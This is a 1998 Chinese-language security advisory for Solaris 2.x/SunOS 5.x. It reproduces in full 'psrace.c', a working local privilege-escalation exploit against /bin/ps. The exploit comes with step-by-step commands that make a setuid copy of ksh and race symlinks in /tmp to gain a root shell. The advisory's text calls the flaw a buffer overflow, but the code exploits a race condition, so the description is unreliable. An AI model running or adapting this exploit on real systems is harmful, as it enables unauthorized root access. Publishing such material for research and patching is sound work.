发布日期：1998-03-11
更新日期：1998-03-11

受影响系统：

Solaris 2.x
SunOS 5.x

描述：

---

/bin/ps存在缓冲区溢出漏洞，可让攻击者获得root权限。





测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
*  psrace.c
*
*  Copyright, 1995, by Scott Chasin (chasin@crimelab.com)
*
*  This material is copyrighted by Scott Chasin, 1995. The
*  usual standard disclaimer applies, especially the fact that the
*  author is not liable for any damages caused by direct or indirect
*  use of the information or functionality provided by this program.
*
*  [ For solaris2.x only ]
*
*  After compiling psrace, run the following commands:
*
*  cp /bin/ksh $HOME/rootshell; chmod 14755 $HOME/rootshell
*  /bin/sh -c 'while /bin/true ; do ps > /dev/null ; done' &
*  ./psrace $HOME/rootshell
*
*  (Ignore any errors you get from ps)
*  You may have to wait a few minutes before the race is won.
*/
#include <stdio.h>
#include <sys/types.h>

#include <dirent.h>
#include <sys/stat.h>

main (argc, argv)
int argc;
char **argv;
{
  int count = 0;
  DIR *dirp;
  struct dirent *dp;
  struct stat fileinfo;
  char targetfile [85], name [85];

  if (argc != 2)
   {
      printf ("Usage: psrace [/full/path/to/target/filename]\n");
      exit (1);
   }

  if (access (argv[1], 0))
   {
      printf ("psrace: %s does not exist.\n", argv[1]);
      exit (1);
   }

  strcpy (targetfile, argv[1]);

  stat ("/tmp", &fileinfo);
  if (fileinfo.st_mode & S_ISVTX)
   {
      printf ("psrace: Congratulations! You already have the fix in place.\n");
      printf ("psrace: (/tmp has the sticky-bit set)\n");
      exit (1);
   }

  printf ("Be patient, this could take awhile.\n");
  printf ("Starting the race .. ");
  fflush (stdout);

  dirp = opendir ("/tmp");

  for (;;)
   {
     unlink ("/tmp/ps_data");

     while ((dp = readdir (dirp)) != NULL)
      {
        if (!strncmp (dp->d_name, "ps.", 3))
         {
           sprintf (name, "/tmp/%s", dp->d_name);
           unlink (name);

           symlink (targetfile, name);

           if (stat (targetfile, &fileinfo) >= 0)
               if (fileinfo.st_uid == 0)
                 {
                   printf ("We WON!\n");
                   closedir (dirp);
                   clean_up ();
                 }
         }
      }
     rewinddir (dirp);
   }
}


clean_up ()
{
  DIR *dirp;
  struct dirent *dp;
  char name [25];

  dirp = opendir ("/tmp");

  while ((dp = readdir (dirp)) != NULL)
      if (!strncmp (dp->d_name, "ps.", 3))
       {
          sprintf (name, "/tmp/%s", dp->d_name);
          unlink (name);
       }
  closedir (dirp);

  unlink ("/tmp/ps_data");
  exit (0);
}




建议：

---

到www.sun.com去寻找最新补丁。





浏览次数：22641
严重程度：0（网友投票）